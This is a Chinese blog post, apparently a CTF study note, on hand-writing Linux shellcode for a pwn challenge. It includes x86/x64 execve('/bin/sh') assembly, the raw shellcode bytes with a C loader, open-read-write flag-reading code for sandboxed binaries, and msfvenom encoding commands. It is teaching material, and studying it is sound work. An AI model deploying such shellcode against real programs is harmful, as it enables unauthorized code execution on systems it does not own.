shellcode学习

最新推荐文章于 2024-06-18 21:15:19 发布
最新推荐文章于 2024-06-18 21:15:19 发布
阅读量4.8k 收藏 8
点赞数 1
分类专栏: ctf 文章标签: 安全 系统安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52878095/article/details/123442857
版权

一道题目

最近在buu上面刷题的时候发现了一道题目 ciscn_2019_s_9 ,这道题目需要我们自己编写 shellcode ,以前 shellcode 都是从 pwntools 或者是msf里面直接生成的,所以借此机会来学习一下 shellcode 的编写

我们先检查一下附件的保护机制 ,啥保护也没开,所以我们可以直接在栈上面构造shellcode然后执行

byXI1J.png

丢到IDA里面看一下,这里变量s的栈空间只有.0x20大小,而fgets函数可以读入50即0x32,所以存在栈溢出

byjMBq.png

我们看一下 pwntools 直接生成的 shellcode ,可以看到有足足0x2c大小,栈是装不下的,所以需要我们手写 shellcode

byjfbt.png

byjbvj.png

常见获取shellcode的方法

pwntools

在 pwntools 里面使用 shellcraft 函数生成 shellcode ,使用该函数的时候需要在前面指定架构,因为每个架构生成的 shellcode 是不一样的

context(os = 'linux', arch = 'i386')	# os是指操作系统,arch指架构
shellcode = shellcraft.sh()

直接使用 shellcraft.sh() 可以直接生成汇编语言格式的 shellcode

这里拿 i386 架构的 shellcode 浅析一下

form pwn import *
context(os = 'linux', arch = 'i386')
shellcode = shellcraft.sh()
print(shellcode)

b6pFfK.png

这就是pwntools生成的shellcode

msf

msf是一个漏洞利用框架,可以使用msfvenom生成shellcode

直接 msfvenom --help 就可以查看相关命令

bTxawt.png

使用 --list 可以列出一些payload的信息

bTxhkV.png

msfvenom就是一个生成shellcode的工具,这里不做过多的介绍,关于该工具的更多使用,大家可以上网查阅

exploit-db

这是一个漏洞库,里面会有很多漏洞利用的shellcode

官网 : https://www.exploit-db.com/

该网站有很多最新或者以前的漏洞,里面一般都有exp,也可以从这些exp中学习shellcode

shell-storm

这个网站里面有很多大佬写的shellcode

网站 : http://shell-storm.org/shellcode/

shellcode编写

前置知识

首先我们学习一下系统调用,程序在执行到int 0x80的时候会进入内核态执行相应的系统调用,这时候eax/rax存放的是系统调用号,然后寄存器里面存放着各个参数

x86

x86程序的参数分别由ebx/ecx/edxesi/edi/ebp存放

x64

x64程序的参数分别由rdi/rsi/rdx/r10/r8/r9存放

简单的shellcode

这里我们使用汇编来编写练习一下shellcode的编写

x86
;nasm -f elf32 shellcode_x86.asm
;ld -m elf_i386 -o shellcode_x64 shellcode_x86.o

global _start
_start:
        push 0x68732f	;push '/sh'
        push 0x6e69622f	;push '/bin'
        mov ebx, esp	;ebx='/bin/sh'
        xor edx, edx	;edx=0
        xor ecx, ecx	;ecx=0
        mov eax, 0xb	eax=0xb
        int 0x80
x64
;nasm -f elf64 shellcode_x64.asm
;ld -m elf_x86_64 -o shellcode_x64 shellcode_x64.o

global _start
_start:
        mov rbx, '/bin/sh'	;将'/bin/sh'赋值给rbx
        push rbx	;将rbx的值,即'/bin/sh'压入栈中
        push rsp	;将esp的值压入栈中
        pop rdi		;将esp赋值给rdi,rdi='/bin/sh'
        xor rsi, rsi	;rsi=0
        xor rdx, rdx	;rdx=0
        mov rax, 0x3b	;rax=0x3b
        syscall

其实归根到底就是调用 execve('/bin/sh', 0, 0)

我们测试一下,使用 objdump 将文件的汇编代码以及十六进制显示出来 objdump -d shellcode_x64.o

bTvSUK.png

然后我们写一个加载器,加载这个shellcode,我们把shellcode设置为局部变量,这样就会加载在栈上,然后我们给栈可执行权限 -z execstack

// gcc exp.c -o exp -g -z execstack
#include <stdio.h>
#include <string.h>
int main(){
	char buf[] = "\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53\x54\x5f\x48\x31\xf6\x48\x31\xd2\xb8\x3b\x00\x00\x00\x0f\x05";	// shellcode
    	void (*fp)(void) = (void (*)(void))buf;
    	printf("Length : %ld\n", strlen(buf));
    	fp();
    	return 0;
}

我们运行,成功拿到一个shell

bTxtOA.png

orw

在PWN比赛中有时会遇到开了沙盒的题目,这时候大部分系统调用都被禁用了,一般open、read、write这三个系统调用不会被禁用,所以我们可以使用orw直接将flag打印出来

;x86
global _start
_start:
	push 'flag'		;fd=open(flag, 0)
	mov eax, 0x5
	mov ebx, esp
	mov ecx, 0
	int 0x80
	mov ebx, eax	;read(fd, addr, 0x40)
	mov eax, 0x3
	mov ecx, addr
	mov edx, 0x40
	int 0x80
	mov ebx, 0x1	;write(1, addr, 0x40)
	mov eax, 0x4
	mov ecx, addr
	mov edx, 0x40
	int 0x80

shellcode变形

有时候程序会只让我们输入可打印字符,这是我们就需要将shellcode进行变形

对于x86的话,msf里面有个内置的encoder模块,可以生成编码过后的shellcode

b7SmUx.png

也可以使用管道符来对自己的shellcode进行编码

cat shellcode | msfvenom -p linux -e x86/alpha_upper BufferRegister=eax

参考文章

https://blog.csdn.net/qq_35495684/article/details/79583232

https://docs.pwntools.com/

BOYcc1
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第二次简单的栈溢出
XJJ的博客
04-29 2970
当没有一个shell的返回地址时,可以自己构造shell,并将它写入.bss段,因为很可能栈不可执行
Shellcode
weixin_43916678的博客
07-07 8959
shellcode简介 shellcode是一段用于利用软件漏洞而执行的代码,也可以认为是一段填充数据,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。shellcode常常使用机器语言编写。 可在暂存器eip溢出后,塞入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。 下面这张图就是shellcode工作流程,从功能上看,shellcode在整个漏洞利用过程中发挥主要作用就是对计算机端的控制。 shellcode可以按照攻击者执行的位置分为本地s
最短shellcode提取方法和测试【原创】
12-13
这是一个windows弹出对话框的shellcode,38个字节 在windows xp sp3下测试 已在vc++6,mingw,cygwin下编译测试
【网络资源学习笔记】ShellCode相关内容学习
天在等我,菜鸟想飞
07-14 2608
个人shellcode相关网络资源学习记录
Shellcode详解
最新发布
N阶二进制的博客
06-18 1685
Shellcode是一种小巧、紧凑的机器代码,通常用于利用软件漏洞或注入攻击中。其名称来源于早期的黑客技术,其中的代码通常会启动一个命令行shell(如Bash或cmd),因此称为“shellcode”。不过,现在shellcode不仅仅用于启动shell,还可以执行各种恶意活动,如下载并执行恶意软件、修改系统设置等。
免杀入门---shellcode免杀
LvHLong的博客
05-03 5514
前言 本文仅用于技术学习和交流,严禁用于非法用途,否则产生的一切后果自行承担。 基础概念 免杀 免杀技术全称为反杀毒技术Anti Anti- Virus简称“免杀”,它指的是一种能使病毒木马免于被杀毒软件查杀的技术。 杀毒软件工作原理 市面上的杀毒软件基本由扫描器、病毒特征库和虚拟机组成,它会把文件放在虚拟机内运行,扫描该文件的特征,包括静态特征、内存特征、行为特征等,通过和病毒特征库对比来判断一个文件是否为恶意文件。安全厂商一直在收集市面上出现的...
第二道pwn题:shellcode
小白垃圾笔记2
03-08 695
rbp:保存的是栈中当前执行函数的基本地址。当前执行函数所有存储在。这里使用了视频说这里用了 call rax所以不能用F5。查看文件类型和保护,虽然现在的我·还没有明白太多的保护。那么如果我们输入shellcode不久获取到了权限了吗。最重要的是最后,call rax,[rbp+buf]栈上的数据都要靠rbp指针加上偏移量来读取。rsp:栈指针,永远指向栈顶。他的意思就是执行输入的内容。64位,放到ida里边。
shellcode基础(1)
GVFDBDF的专栏
09-16 2756
题目: 已知以下是我写得一串x86二进制指令码,可以将其加载并运行。 char buff[]= {"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30" "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" "\x31\xc0\xac\x3c\x6
vbs shellcode转换escape加密
09-06
总之,通过上述知识点的学习,我们可以深入了解如何使用VBS来处理和加密shellcode,这对于从事网络安全研究的专业人士来说是非常有用的技能。同时,也提醒大家要合理使用这些技术,避免非法用途。
CDL_shellcode_源码
10-02
在IT领域,Shellcode是一种特殊的低级代码,通常用汇编语言编写,用于...通过分析`CDL.java`,我们可以学习到如何将高级语言(如Java)转换为低级别的Shellcode,这对于理解和对抗基于JavaScript的恶意软件至关重要。
用C++撰写shellcode.zip
10-06
总之,通过学习这个教程,你可以深入了解shellcode的制作过程,掌握在C++中编写和使用shellcode的技能,同时对网络安全有更深入的理解。请务必遵循法律和道德规范,只在适当的环境中实践这些技术。
shellcode加载器用于加密shellcode的py小玩意
10-03
7. **安全性与法律问题**:虽然这个项目声称用于研究学习,但使用shellcode加载器和加密shellcode的行为可能涉及网络安全法规。因此,任何实际操作都应在合法且受控的环境中进行,避免违法行为。 总之,这个项目...
Android系统shellcode编写.zip_android_shellcode
09-23
学习和编写Android shellcode通常涉及以下步骤: 1. **理解基本概念**:熟悉汇编语言,了解不同架构下的指令集,如ARM或x86。 2. **环境模拟**:使用工具如QEMU模拟Android环境,进行shellcode测试。 3. **权限...
linux上的shellcode写法(pwntools,手写shell
逆向萌新的博客
07-16 3205
这些连在一起,则生成shell是/bin///之后下面就是调用,movebx,esp这步就是必须存在的,之后中间是调用的方法,最后是调用SYS_execve来运行这个/bin////sh但是如果最后在输入的时候长度不够写入这么多的时候,这个脚本就要更变,在针对没开NX保护的程序的时候,我们可以想着在栈内执行这些,长度还不用,那么我们要进行一个更改。这里就要说到调用规则了,x64下,调用规则是rdi,rsi,rdx,rcx,r8,r9,需要按照这个去调用,这个还是调用规则的问题,最后要变成想要的样子。....
一篇文章彻底清楚shellcode(精品)
weixin_51055545的博客
03-08 8983
shellcode 类题目 文章目录shellcode 类题目1.没开沙箱(此时我们可以系统调用get shell)picoctf_2018_shellcodemrctf2020_shellcode2.开启沙箱(orw读flag)gwctf_2019_shellcode 1.没开沙箱(此时我们可以系统调用get shell) (一)32位程序系统调用 32位程序有别于64位程序,32位通过栈传参,我们常用的寄存器有4个数据寄存器(eax,ebx,ecx,edx),2个变址寄存器(esi,edi),2个指针寄
PWN入门(6)写入shellcode
Ba1_Ma0的博客
09-20 1964
pwn"这个词的源起以及它被广泛地普遍使用的原因,源自于魔兽争霸某段讯息上设计师打字时拼错而造成的,原先的字词应该是"own"这个字,因为 ‘p’ 与 ‘o’ 在标准英文键盘上的位置是相邻的,PWN 也是一个黑客语法的俚语词,是指攻破设备或者系统。发音类似"砰”,对黑客而言,这就是成功实施黑客攻击的声音,而在ctf比赛里,pwn是对二进制漏洞的利用下载这个github库,进入05文件夹。
pwn学习笔记(一)
qq_41560595的博客
03-18 1478
ret2text: 程序中提供了后门函数,自己复写返回地址为后门函数地址。 .bss 、.data、.text三个段是elf文件在磁盘上本来就有的文件,进入到内存后仍然存在。PIE影响这三个部分。
威胁分析与响应能力—Shellcode分析与检测技巧
qq_44005305的博客
08-30 1005
shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。shellcode常常使用机器语言编写。可在暂存器eip溢出后,塞入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。
PWN --- ret2shellcode
qq_41696518的博客
06-28 881
PWN ret2shellcode
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值